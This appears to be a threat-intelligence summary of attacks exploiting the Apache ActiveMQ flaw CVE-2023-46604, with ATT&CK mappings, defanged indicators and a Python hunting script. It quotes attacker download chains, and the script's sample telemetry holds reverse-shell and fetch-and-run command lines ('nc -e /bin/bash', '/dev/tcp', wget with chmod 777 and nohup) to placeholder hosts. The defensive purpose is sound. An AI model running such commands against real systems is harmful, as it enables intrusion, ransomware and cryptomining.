Keypoints
- Unauthenticated RCE against Apache ActiveMQ (CVE-2023-46604) was exploited prior to public disclosure, enabling direct code execution via the OpenWire protocol.
- Vulnerable versions: Artemis 2.31.2 and Classic prior to 5.18.3 are affected by the insecure deserialization vector involving Spring’s ClassPathXmlApplicationContext.
- Three primary attack patterns observed: automated wget/curl download chains, base64-encoded scripts that fetch and run payloads (leading to HelloKitty), and interactive/netcat reverse shells (file-descriptor and nc -e methods).
- Observed payloads include Mirai (ELF), SparkRAT (Go), HelloKitty ransomware (Golang), and XMRig/XMRigCC coinminers; payloads often saved with evasive names and run with nohup to persist.
- Post-exploitation behavior included stopping database services (mysql/oracle/postgresql), encrypting files (extension .locked), dropping ransom notes and keys, and attempting lateral movement via SSH.
- Defensive recommendations: restrict ActiveMQ exposure, upgrade affected ActiveMQ versions, add provided IoCs to blocklists, and hunt using endpoint telemetry for the described behaviors.
MITRE Techniques
- [T1190] Exploit Public-Facing Applications – Used to gain initial unauthenticated RCE against ActiveMQ via OpenWire EXCEPTION_RESPONSE and Spring XML loading (‘…Exploitation of the CVE-2023-46604 vulnerability allows attackers to execute unauthenticated RCE on machines running vulnerable Apache ActiveMQ…’)
- [T1059] Command and Scripting Interpreter – Attackers executed shell commands (wget, curl, base64 decode, bash) to download and run payloads (‘…the most commonly observed behaviors were attempts to download additional payloads using two separated download commands: wget and curl.’)
- [T1546.016] Event Triggered Execution: Installer Packages – Adversaries used script-based installers, chmod and command chaining to make binaries executable and keep them running under nohup (‘…is given full file privilege (777) via chmod and executes > /dev/null … nohup prevents the process being stopped…’)
- [T1027] Obfuscated Files or Information – Base64-encoded bash commands were used to hide the payload retrieval and execution steps (‘…the second methodology attempts executing Base64 encoded commands. The decoded commands are similar to first methodologies…’)
- [T1041] Exfiltration Over C2 Channel – C2 channels used for payload staging and command retrieval indicate potential exfiltration and C2 interaction (‘…C2 server (172.245.16[.]125) … URL related to HelloKitty Ransomware’)
- [T1567] Exfiltration Over Web Service – Use of web-hosted resources (transfer[.]sh and HTTP endpoints) for payload hosting and control (‘…transfer[.]sh/EewPaMsAUA/xmrig … transfer[.]sh hosting XMRig’)
- [T1071.001] Application Layer Protocol: Web Protocols – Command-and-control and payload delivery over HTTP/HTTPS (curl/wget to HTTP hosts) (‘…curl command downloads linux.sh from 45.32.120[.]181…’)
- [T1485] Data Destruction – Ransomware routines included stopping services and removing or overwriting files as part of impact operations (‘…Stops and disables multiple database related services like mysql, oracle, and postgresql.’)
- [T1486] Data Encryption for Impact – HelloKitty ransomware encrypted files (appended .locked) and dropped ransom notes across directories (‘…Searches through directories and encrypts files with extension .locked. Outputs README1.html on every directory…’)
- [T1584.005] Compromise Infrastructure: Botnet – Mirai deployment and botnet-related binaries were installed to expand botnet infrastructure (‘…Mirai botnet downloader … wget hxxp://82.115.220[.]81/bins/x86 … Mirai Bot’)
Indicators of Compromise
- [IP] C2 and staging hosts – 82.115.220[.]81 (Mirai C2), 45.32.120[.]181 (SparkRAT script host), and 16 other IPs used for scanning, staging, and reverse shells
- [SHA256] Payload hashes – 01c6c81abf1206caf6c4004bae8c4999624228c8b1ce7514503e4150c10c21b5 (XMRig), 7af5c37cc308a222f910d6a7b0759837f37e3270e22ce242a8b59ed4d7ec7ceb (HelloKitty), and 3 more hashes
- [URL] Payload and script URLs – hxxps://transfer[.]sh/EewPaMsAUA/xmrig (XMRig), hxxp://172.245.16[.]125/down (HelloKitty staging), and other hosting URLs like hxxp://45.32.120[.]181/linux.sh
- [File name] Observed filenames and scripts – .bash2 (HelloKitty binary), ss64 (HelloKitty payload name), l_x86/.X12-unix (SparkRAT binaries), and other temporary script names
Cybereason’s technical analysis shows CVE-2023-46604 is exploited by sending a malicious OpenWire EXCEPTION_RESPONSE that causes ActiveMQ to use Spring’s ClassPathXmlApplicationContext to load attacker-controlled XML over HTTP; this insecure deserialization chain yields unauthenticated RCE on affected Classic (<5.18.3) and Artemis (2.31.2) builds. Attackers then run shell commands (wget/curl) or base64-encoded bash pipelines to fetch and execute staged scripts (linux.sh, 1.sh, 2.sh, down/.exec), which download architecture-specific binaries (e.g., l_x86, x86, .X12-unix), mark them executable (chmod 777) and launch them under nohup so they survive the session, deploying payloads such as Mirai, SparkRAT, HelloKitty (Golang ransomware), and XMRig/XMRigCC miners.
Post-exploitation behaviors include disabling database services (mysql, oracle, postgresql), recursively encrypting files with a .locked extension, writing ransom notes (README1.html, encfile1.txt, public1.txt, showkey1.txt), and attempting SSH lateral movement. In other cases, attackers established interactive access using reverse shells via bash file descriptors (/dev/tcp//) and Netcat (nc -e /bin/bash), then performed enumeration (ls, whoami, cat .bash_hi) and attempted to host or fetch additional tools with python -m http.server, apt installs, and direct curl/wget retrieval from transfer[.]sh and other hosts.
For responders, focus on: identifying ActiveMQ instances running vulnerable versions, hunting for wget/curl chains, base64-decoded bash commands, nohup executions, unusual binaries in /tmp or /var/tmp, reverse-shell connections to IPs listed in IoCs, and the SHA256 hashes provided; prioritize isolating hosts, blocking IoC network indicators, and restoring from clean images after full remediation.
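The hunting guidance above, turned into a small detection script (an added example, not code from the Cybereason report): it runs regex rules for the described behaviors (download-and-chmod chains, base64-to-bash pipelines, nohup persistence, nc -e and /dev/tcp reverse shells, execution from /tmp) over constructed process-telemetry lines, and checks an ActiveMQ Classic version string against the 5.18.3 threshold stated above. The hosts, ports and the base64 string are placeholders, not the report's IoCs.

```python
import re
from typing import List, Tuple

# Constructed sample process-execution telemetry (one command line per entry);
# the hosts, ports and encoded string are placeholders, not IoCs from the report.
SAMPLE_EVENTS = [
    "sh -c wget http://203.0.113.10/linux.sh -O /tmp/linux.sh; chmod 777 /tmp/linux.sh; nohup /tmp/linux.sh > /dev/null 2>&1 &",
    "bash -c echo ZWNobyBoaQo= | base64 -d | bash",
    "nc -e /bin/bash 203.0.113.20 4444",
    "bash -i >& /dev/tcp/203.0.113.20/4444 0>&1",
    "/tmp/.X12-unix",
    "java -jar /opt/activemq/bin/activemq.jar start",
    "ls -la /home",
]

# Each rule is (name, regex). The patterns follow the post-exploitation behaviours
# described above: download chains, encoded bash, reverse shells, nohup, temp-dir execution.
RULES: List[Tuple[str, re.Pattern]] = [
    ("download_chain", re.compile(r"\b(wget|curl)\b.*\b(chmod|sh|bash)\b")),
    ("chmod_777", re.compile(r"\bchmod\s+777\b")),
    ("nohup_persist", re.compile(r"\bnohup\b")),
    ("base64_to_shell", re.compile(r"base64\s+(-d|--decode)\s*\|\s*(ba)?sh\b")),
    ("netcat_shell", re.compile(r"\bnc\b.*\s-e\s+/bin/(ba)?sh\b")),
    ("devtcp_shell", re.compile(r"/dev/tcp/[^/\s]+/\d+")),
    ("tmp_exec", re.compile(r"^/(?:var/)?tmp/\S+")),
]

def classify(cmdline: str) -> List[str]:
    """Return the names of every rule the command line matches, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]

def hunt(events: List[str]) -> dict:
    """Map each suspicious command line to its matched rules; benign lines are dropped."""
    return {e: hits for e in events if (hits := classify(e))}

def activemq_classic_vulnerable(version: str) -> bool:
    """True when a Classic version string is below 5.18.3, the threshold given above.
    Older maintenance branches received separate fixes, so confirm against the vendor advisory."""
    major, minor, patch = (int(p) for p in version.split(".")[:3])
    return (major, minor, patch) < (5, 18, 3)

if __name__ == "__main__":
    for cmd, hits in hunt(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits):<40} {cmd}")
    print("5.18.2 vulnerable:", activemq_classic_vulnerable("5.18.2"))
```

Feed real EDR or auditd command lines into hunt() in place of SAMPLE_EVENTS; a hit on any single rule is a triage lead, and several rules on one line (as in the first sample) is the download-chain pattern the report describes.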
Read more: https://www.cybereason.com/blog/beware-of-the-messengers-exploiting-activemq-vulnerability